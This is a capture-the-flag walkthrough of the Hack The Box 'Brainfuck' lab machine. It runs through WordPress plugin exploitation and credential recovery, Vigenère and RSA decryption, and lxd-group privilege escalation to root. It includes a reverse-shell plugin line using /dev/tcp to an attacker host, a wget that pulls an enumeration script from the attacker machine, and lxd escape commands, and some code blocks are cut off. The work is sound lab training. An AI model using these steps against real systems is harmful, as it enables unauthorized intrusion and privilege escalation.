# Hack The Box - BrainFuck Walkthrough without Metasploit ![Brainfuck](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQpicu8-IAErf9fHO3h%2F-MQqSNRJbgidbNfT2ex8%2Fimage.png?alt=media\&token=dd59b4e1-280f-4312-964d-6e728d811df6) ## Enumeration We will use **nmapAutomator** script for this box: {% embed url="" %} It's a really useful script, easy to use and that will quickly show us the open ports, then it'll perform some basic scans on those ports, to do so it runs nmap, gobuster, nikto, smbmap, wpscan.. among others, really useful to have it running on the background meanwhile we work on the open ports, but **remember** sometimes we **will** have to use tools such as gobuster manually with other wordlists in order to find certain pages that might not be included in the wordlist used by this script, ***scripts to enum are useful but we shouldn't totally relay on them.*** We will run it with the flag **All** which run all the scans consecutively, but it's the one that takes more time: ``` ./nmapAutomator.sh 10.10.10.17 All ``` The Basic Nmap scan returns the following: ![Nmap Basic Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqaFYFgR61-4sBIxNn%2Fimage.png?alt=media\&token=0e60fd1b-5c27-4df6-baf0-7edad80f918e) ### Ports We have the Following ports open #### 25, 110, 143 This ports are all related to mailing, for now, we will let them be, as we have a potentially better attacking vector at other port. #### 443 This port is related to HTTPS, so let's try to see if there's anything interesting: ![Nginx Welcome page](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqaZmy7kC0MbBKw1YL%2Fimage.png?alt=media\&token=6c2a0b84-1248-49e4-8204-25a5e636a925) The index page gives us the title Welcome to nginx!. This is likely a configuration issue where the IP address does not know which hostname it should map to in order to serve a specific site, and instead it's serving the nginx default page. In order to fix this issue we need to figure out the hostname (or hostnames) that resolve to this IP address and then we will need to map them on our /etc/hosts file. From our previous nmap scan we can get three possible hostnames: ![Hostnames Discovered](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqbbrvhjhfRKYu67tl%2Fimage.png?alt=media\&token=320629b6-f5de-46c9-a567-c2c219d92e7b) ### Adding hostnames In this machine we do need to add the discovered hostnames to our /etc/hosts in order be able to visit the different potential pages: ``` sudo nano /etc/hosts ``` ![/etc/hosts entry](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqdlFwvfBZiauxdPsR%2Fimage.png?alt=media\&token=89f5a953-ccba-46a6-b31c-6ec08f84f515) ### Wordpress Page On or we will access the following web page: ![Wordpress page](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqdLU7tzbP5bmmZkOi%2Fimage.png?alt=media\&token=1c2d5b35-2724-454d-aecd-0364a8eeb9c4) It's a Wordpress page and we can already see a username **orestis**, we will be running WPScan now on the background to see if we can find any vulnerabilities on this Wordpress, we will run it with the following flags: \--url --> Needed to specify the url where the wordpress site being scanned is \--passwords --> here we will choose our wordlist to try and bruteforce possible users ```bash wpscan --url https://brainfuck.htb/ --passwords /path/to/your/wordlist ``` ![WPScan failed due SSL](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqelPuWYzRJnTlouvT%2F-MQqihzmQwrixelElR6j%2Fimage.png?alt=media\&token=702ae89d-fc48-4cb7-af50-3ead0d73f95d) In this case the scan has failed since it's **HTTPS** but WPScan has a flag we can choose in order to try and scan it: **--disable-tls-checks** ``` wpscan --url https://brainfuck.htb/ --passwords rockyou.txt --disable-tls-checks ``` The output is quite big, but the most important things we have noticed: #### Plugin They have installed **wp-support-plus-responsive-ticket-system** ![Plugins installed](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqvy1hoKcvcTobZyl3%2Fimage.png?alt=media\&token=2872bc15-5fe2-41e3-94ea-360d8bc02c9f) And we also know the version: ![WP Support Plus Responsive Ticket System Plugin Version](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqw7IhjinPetT49xSr%2Fimage.png?alt=media\&token=059c84a7-f19f-4993-97c6-3d957f9ed9c5) With a quick search: ``` searchsploit WP Support Plus ``` ![Vulnerable Plugin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqx6HwSOJcLTnGCmRh%2Fimage.png?alt=media\&token=f7fa8b0f-ac70-4cec-a871-0f0cf51798f7) #### Users ![Wordpress Usernames](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqlegfXxwF69P8x5tx%2Fimage.png?alt=media\&token=9605ba81-e8e1-44d8-a18a-b50993acc29d) We couldn't bruteforce any password but we have two users and a vulnerable plugin. ![Vulnerable Plugin PoC](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQr0tg1x6uIh_2vubE1%2Fimage.png?alt=media\&token=852fe04c-e406-4ad0-8357-c888d745e18b) We edit the Proof of Concept so we can use it: ```markup
Username:
``` We set up a quick and fast python Simple Http Server to access the file: ![Python Http Server](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrC5p5enKYScdy7RVv%2Fimage.png?alt=media\&token=05915480-2de7-486b-b704-82b531b63db5) And access the file: ![PoC html File](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrCKoSlusWm8e7crJX%2Fimage.png?alt=media\&token=c31c8b60-d6b8-409a-af5c-dd0de4d4c8c5) We press on Login and go back to our Wordpress page to refresh it, we will see we are now the administrator: ![Wordpress Administrator](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrKS2lic3jvK_TOwg2%2Fimage.png?alt=media\&token=b0a5364e-ba24-475c-9042-c0dd3d29d7bf) Sadly there isn't much to do as Administrator, but if we try with the other user admin: ![Wordpress Admin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrMF5YtWWguKkv0T-B%2Fimage.png?alt=media\&token=87f8af7c-72eb-407f-9814-08679dea7836) If we go to Dashboard: ![Wordpress Dashboard](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrMV0d1QkMhjhPAaCb%2Fimage.png?alt=media\&token=16ca74e6-f1c7-46e7-ad55-315aa0d59133) Normally, what we would do first when we log in with an administrator account in Wordpress is either to modify an Appearance Theme page in order to get a reverse shell: Going to Appearance --> Editor --> Selecting a template (for example the 404.php) and editing its content with a reverse shell like pentestmonkey one: {% embed url="" %} And then Updating the file so we can access it from our browser ![Trying to edit 404 template](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsnEfDSm7RPodnnuI2%2F-MQt80ezo9CwI5yOhBC2%2Fimage.png?alt=media\&token=de5a31e1-e39f-422e-aa39-06617ae3b9f5) As we can see the files are not writable, so this is not an option. Our second choice would be to try and upload a malicious plugin, in order to do that we have to first create the "plugin", we first create an evilplugin.php and then zip it: ```bash & /dev/tcp/your-ip/port 0>&1'"); ?> ``` ![Evil Plugin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsnEfDSm7RPodnnuI2%2F-MQtBFRnMfkPFloLf7vP%2Fimage.png?alt=media\&token=45acfe14-544b-4ede-9116-9d82bb99fe26) ![Adding a new plugin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsnEfDSm7RPodnnuI2%2F-MQtApVe7-JZieWbqFEU%2Fimage.png?alt=media\&token=5a19e13f-500c-4f46-b58a-48f0236f8fe4) But sadly it doesn't load and keeps on giving us an error page. Inside the Dashboard if we go to Settings we will find Easy WP SMTP and we can see there a username and a password: ![Easy WP SMTP Settings](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrN81VSW17expjX5rD%2Fimage.png?alt=media\&token=d8c8ca8d-ab92-4007-8e98-c661b49bb4be) As username we have **orestis** but the password is protected... right? Well unless we right click and view the source code... in that case.. ![Username and Password in Cleartext](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrNifPv6AywvpFSIXY%2Fimage.png?alt=media\&token=258c34ef-7a05-4d4e-bc7f-15be4220f476) Now we have a username and password for SMPT (mail service) **orestis** // **kHGuERB29DNiNE** #### Wordpress Side Note From time to time WPScan will ask for updates, I do recommend to take that extra seconds and update it: ![Update WPScan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqelPuWYzRJnTlouvT%2F-MQqfbUg_MV-Zmb_e_L1%2Fimage.png?alt=media\&token=e2ec6825-44fe-46a9-8c8d-e3e63f14c810) I really do recommend to take the 5 minutes it takes to create a free account (or paid one if you need to do lots of scans...) and get your WPScan key so you can get the max out of this great tool: {% embed url="" %} ### Mail Application - Evolution It seems we are going to need a mail application in order to use our SMTP user and pass, I decided to install **evolution** installation is quite simple: ```markup sudo apt-get install evolution ``` Once installed we need to configure our new mail, we open up evolution and go to: File --> New --> Mail Account ![Evolution Mail Account Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQr_9Iuqz6U42Y69LBr%2Fimage.png?alt=media\&token=1e12b8d3-1183-41c1-ad38-2f191bd13b80) As Identity we will use **orestis** and as mail **** ![Identity Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrmUj7T2B1yJ7vyNgb%2Fimage.png?alt=media\&token=f2f5b3d2-1014-4ad0-923f-3d7f81e8cb52) On Receiving Email we will configure as follows: Server Type --> **IMAP** Server --> **brainfuck.htb** Port --> **143** Username --> **orestis** Encryption method --> **No encryption** ![Receiving Email Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrltWqCUXwziULUiSg%2Fimage.png?alt=media\&token=4b3a912d-7ff1-42c3-9599-aef468b34b5b) We can leave Receiving Options as they are by default: ![Receiving Options](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrnsXz6nhCFxlgIY4Y%2Fimage.png?alt=media\&token=b699e1a4-e92a-4f41-b02e-f6b83cf13dfa) We will configure the Sending Email as follows: Server Type --> **SMTP** Server --> **brainfuck.htb** Port --> **25** Encryption method --> **No encryption** ![Sending Email Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQroBGqjQUTG-7bdyog%2Fimage.png?alt=media\&token=375ef658-42a8-478f-94e4-31733c219412) Clicking on next we will be able to see our new account summary: ![Account Summary](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrorLV-q9KFC_mMDtI%2Fimage.png?alt=media\&token=5bfdc565-d30e-4fd7-bd96-5728bf8ef34b) We click on Next and Apply the changes, a pop-up will appear asking us for the password: ![Mail Authentication Request](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrp612zMxvZz4Lqiaa%2Fimage.png?alt=media\&token=e223ce0d-a9c8-4cfd-9a15-767202eb8a8a) Once we enter our password we will be able to see our inbox, we have some mails: ![Forum Access Details](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrqA3EuLlMH27waSXj%2Fimage.png?alt=media\&token=b3889441-e8a0-4822-84a5-18c92084a869) We got a new password for the super secret forum we discovered before, seems we have finished with Wordpress and its time to move on to Super Secret Forum with our user and password: **orestis** // **kIEnnfEKJ#9UmdO** ### Super Secret Forum page On we have the following page: ![Super Secret Forum](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqef26dqd2MmE0B7mt%2Fimage.png?alt=media\&token=f542ce8b-d38f-4808-b8d7-7f59583fa6e2) We log in with the new credentials: ![Super Secret Log In Forum](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrquYdWboGGneeVFkM%2Fimage.png?alt=media\&token=a03db7e2-679e-420b-8e8c-5d3cf02bf22f) There are some interesting conversations going on in this forum: ![SSH Access messages](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrrHkJF58RUewcujFX%2Fimage.png?alt=media\&token=9c84248c-b936-4f30-a8ef-ad173aa6e549) So it seems they are going to use some kind of encryption to communicate on another thread... ![Encrypted thread](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrsGNx4bOkXkbNdPbX%2Fimage.png?alt=media\&token=dd33ca5f-f4e1-4501-b0f3-3cc60c84089e) Now we need to know what kind of encryption are they using... we can try to narrow it down with this online tool: {% embed url="" %} Cipher Identifier {% endembed %} The user is using all the time the same sign "**Orestis - Hacking for fun and profit**" and on the encrypted conversation we could see something that resembles a sign "**Wejmvse - Fbtkqal zqb rso rnl cwihsf**" ![](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrv8BCCueO2SL5JU7u%2Fimage.png?alt=media\&token=5b8de185-a626-46cd-ba2d-53aa0e7e2434) #### Decipher Now we can be "*fairly*" sure it's [Vigenère cipher](https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher), so let's make a python script in order to get the key to decipher it: {% embed url="" %} ```python #!/bin/python print ("Vigenere Decipher\n") print ("Text must be entered without Symbols or Space\n") plain = raw_input("Enter Known Text: ") encrypted = raw_input("Enter the corresponding Encrypted text to the known text: ") password = "" for i in range(len(plain)): x = ((ord(encrypted[i]) - ord(plain[i])) % 26) + 97 char = chr(x) password = password + char print password ``` #### Script explanation In order to be able to decrypt the text we need first to obtain the key/password. To do so we need to know *some clear text that corresponds to some cyphered text.* In our case our user has a sign that keeps on using, so we will be using that to get our key. If you want to know something more about Vigenère cipher: {% embed url="" %} Following the instructions of that link we know that the password n letter is calculated by subtracting the n encrypted letter to the n plain letter (the key would be repeated as many times as necessary) modulo 26. $$ Pn = (En - Pn) mod 26 $$ Since we cannot subtract a string from another string in python, we will use the **ord()** function, which returns an integer representing the Unicode Character, now we can apply the formula in order to get the password, but we need to add 97 at the end, since on Unicode the latin alphabet (lowercase) starts at 97. Our script will repeat this process for each letter on the plain text given. We will use the user sign **OrestisHackingforfunandprofit** and the corresponding cipher text **PieagnmJkoijegnbwzwxmlegrwsnn** . ![Python Decipher script](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQs89dV2oakKLKBsNcn%2Fimage.png?alt=media\&token=2953d82e-248f-47d5-bee4-1abafcaa5775) We can get from this that the password for decrypting the messages is "**fuckmybrain**" so now we go back to in order to decrypt the messages, the one we are interested in is : "**mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp\_ptr**" ![Vigenere Online Tool](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQsCsSH1pMeQeoKknFy%2Fimage.png?alt=media\&token=6a84daba-2089-4a51-9ffc-f6a640b38b20) Now we can download what seems to be a ssh key, since its https we will have to add flag to avoid certificates issues **--no-check-certificate** ```bash wget https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa --no-check-certificate ``` ![id\_rsa file](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQsFxwVqcO8pPaK2Gk5%2Fimage.png?alt=media\&token=6412ec3f-8d12-4bcf-ae44-7735587b5c0b) We have to change the permissions on id\_rsa: ```bash chmod 600 id_rsa ``` And now we try to log in with it: ```bash ssh -i id_rsa orestis@10.10.10.17 ``` And it fails! We need a passphrase along with the key in order to enter... luckily we have John The Ripper: ```bash python /usr/share/john/ssh2john.py id_rsa > pass john pass -w /password_list/rockyou.txt ``` Sometimes John may forget to show you the password... if that happens, you can retrieve it by using: ```bash john --show pass ``` ![SSH Key password](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQsIJcAuOENVD014gvF%2Fimage.png?alt=media\&token=219deb24-db7d-44e6-b561-41e52072ef04) Now we can log in with the passphrase "**3poulakia!**" ![Foothold](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQs_QQOTrWxCR7fnj6g%2Fimage.png?alt=media\&token=af1bfe70-a692-43a9-b166-3a86fc7f02bf) We are finally in and we can grab our user flag ! But something more important quickly catch our eye... we are part of the **lxd** group and there are some files **encrypt.sage, debug.txt, output.txt** on our folder... ## Privilege Escalation First thing we do is fire up a python SimpleHTTPServer on our machine (we have to start it in the directory containing the files we want to transfer) in order to grab some enumeration scripts: ```bash python -m SimpleHTTPServer 80 ``` And on the victim we will grab linpeas.sh script and chmod +x it in order to be able to execute it. {% embed url="" %} Awesome Scripts Suite for Privilege Escalation (really awesome :D ) {% endembed %} ```bash wget 10.10.14.3/linpeas.sh chmod +x linpeas.sh ``` So out of all the output from linpeas.sh the most interesting thing we found is what we saw upon entering: ![lxd group](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsSCU9ELjaRwrc5T31%2Fimage.png?alt=media\&token=93a8dbbd-2afd-475d-98ab-98e8aa47313a) ### lxd Group Exploitation LXD is a next gen system container manager, its similar to virtual machines but using Linux containers, if you want to know more about it: {% embed url="" %} In order to try an exploit our group privileges we will use the **Method 1** of this guide: {% embed url="" %} lxd/lxc Group Privilege Escalation {% endembed %} Once we have ready our alpine container we transfer it to the victim: ![Transfer Linux Container](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsUZv4cgpz8A0StAcA%2Fimage.png?alt=media\&token=2a991a1e-0c37-42e3-85ff-9cedd69c6484) We need to import the container with an alias: ```bash lxc image import ./alpine.tar.gz --alias Evil ``` Once imported we will initialize it and make that container a **privileged** one (this is the important part in order to exploit our lxd membership): ```bash lxc init Evil ignite -c security.privileged=true ``` Now we configure the container: ```bash lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true ``` Finally we just need to start and execute it: ```bash lxc start ignite lxc exec ignite /bin/sh ``` If we have followed this steps we should be root (and now we can grab our root flag) Since we have created a **privileged** container and we are root on it... we can access actual root directory ```bash cd /mnt/root/root ``` and we can grab root flag. ## Pwnd ![We are Root](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsWXpSzrFpPybGUnCs%2Fimage.png?alt=media\&token=6c7dc734-3a2b-4eb4-9141-a251d93a1943) ## Extra Ball So... if we remember, we had some files on our user directory **encrypt.sage**, **debug.txt** and **output.txt** ```bash nbits = 1024 password = open("/root/root.txt").read().strip() enc_pass = open("output.txt","w") debug = open("debug.txt","w") m = Integer(int(password.encode('hex'),16)) p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False) q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False) n = p*q phi = (p-1)*(q-1) e = ZZ.random_element(phi) while gcd(e, phi) != 1: e = ZZ.random_element(phi) c = pow(m, e, n) enc_pass.write('Encrypted Password: '+str(c)+'\n') debug.write(str(p)+'\n') debug.write(str(q)+'\n') debug.write(str(e)+'\n') ``` So this script is reading the content of roots flag, and placing its value into the var **m**, then it creates two random numbers **p** and **q**, multiply them and puts that value in **n** then it calculates **phi** (**p**-1)\*(**q**-1), finally we have the final values of **c** (the encrypted password) which is written on **output.txt** and the values of **p**, **q** and **e** on **debug.txt** ![value of C](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsbV-a4S-j9lLIXgyK%2Fimage.png?alt=media\&token=6dc35fa8-beb3-4a74-aab9-3857caf25eb2) ![Values of P, Q and E](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQscTDbhb5KTxzobfYd%2Fimage.png?alt=media\&token=f4f7edea-cfab-4dc4-96af-522f2d084e64) Looking how to calculate the RSA given the values we have found the following link : {% embed url="" %} Modifying the script on that page we end up with this one: ```bash def egcd(a, b): x,y, u,v = 0,1, 1,0 while a != 0: q, r = b//a, b%a m, n = x-u*q, y-v*q b,a, x,y, u,v = a,r, u,v, m,n gcd = b return gcd, x, y def main(): p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307 q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079 e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997 ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182 # compute n n = p * q # Compute phi(n) phi = (p - 1) * (q - 1) # Compute modular inverse of e gcd, a, b = egcd(e, phi) d = a print( "n: " + str(d) ); # Decrypt ciphertext pt = pow(ct, d, n) print( "pt: " + str(pt) ) if __name__ == "__main__": main() ``` ![Script output](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsg20dHgVPmNKpavGe%2Fimage.png?alt=media\&token=4d507fdd-263f-470c-8f68-c2c893880954) As we can see we have the password (root.txt) value, but now we need to decode it as it was hex encoded at the beginning of **encrypt.sage**, for that we will modify our script, it will finally look like this: ```bash def egcd(a, b): x,y, u,v = 0,1, 1,0 while a != 0: q, r = b//a, b%a m, n = x-u*q, y-v*q b,a, x,y, u,v = a,r, u,v, m,n gcd = b return gcd, x, y def main(): p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307 q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079 e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997 ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182 # compute n n = p * q # Compute phi(n) phi = (p - 1) * (q - 1) # Compute modular inverse of e gcd, a, b = egcd(e, phi) d = a print( "n: " + str(d) ); # Decrypt ciphertext pt = pow(ct, d, n) print( "pt: " + str(pt) ) root = hex(pt) root = str(root[2:-1]) print root.decode("hex") if __name__ == "__main__": main() ``` now if we execute it again.. ![Root? flag :D](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQshVNQnZaoYxFxXIzc%2Fimage.png?alt=media\&token=4489d84a-9053-4681-8165-bee37dcff426)